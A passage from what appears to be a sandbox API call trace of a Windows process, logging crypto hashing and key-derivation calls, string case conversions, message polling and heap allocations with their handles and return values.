(in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa378, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0122.738] CryptHashData (hHash=0x9a4880, pbData=0x2a72698, dwDataLen=0x3, dwFlags=0x1) returned 1 [0122.738] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.738] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.738] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.738] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.738] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.738] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.738] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.738] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.738] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0122.738] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.738] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0122.738] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.738] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.738] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa2b8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0122.739] CryptDeriveKey (in: hProv=0x9bee68, Algid=0x6601, hBaseData=0x9a4880, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4a40) returned 1 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0122.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0122.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0122.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0122.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0122.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0122.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a698b0 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0122.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2aae878 [0122.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7720 | out: hHeap=0x2af0000) returned 1 [0122.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0122.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0122.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0122.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0122.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0122.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0122.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0122.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0122.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0122.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0122.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0122.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0122.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0122.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0122.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0122.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0122.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0122.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0122.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0122.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0122.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0122.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0122.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0122.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0122.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0122.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0122.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0122.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0122.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0122.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0122.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0122.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0122.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0122.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0122.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0122.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0122.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0122.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0122.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0122.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0122.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0122.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0122.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0122.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0122.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0122.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0122.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0122.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0122.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0122.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0122.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0122.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0122.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0122.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa270 [0122.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa318 [0122.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa240 [0122.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0122.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa438 [0122.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0122.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa3f0 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa4f8 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa528 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa330 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0122.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa258 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa288 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa2e8 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa348 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa450 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa468 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa360 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0122.756] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0122.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa498 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a739c8 [0122.756] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0122.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0122.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0122.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0122.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0122.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0122.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0122.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0122.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0122.757] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0122.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0122.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0122.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0122.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0122.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0122.757] 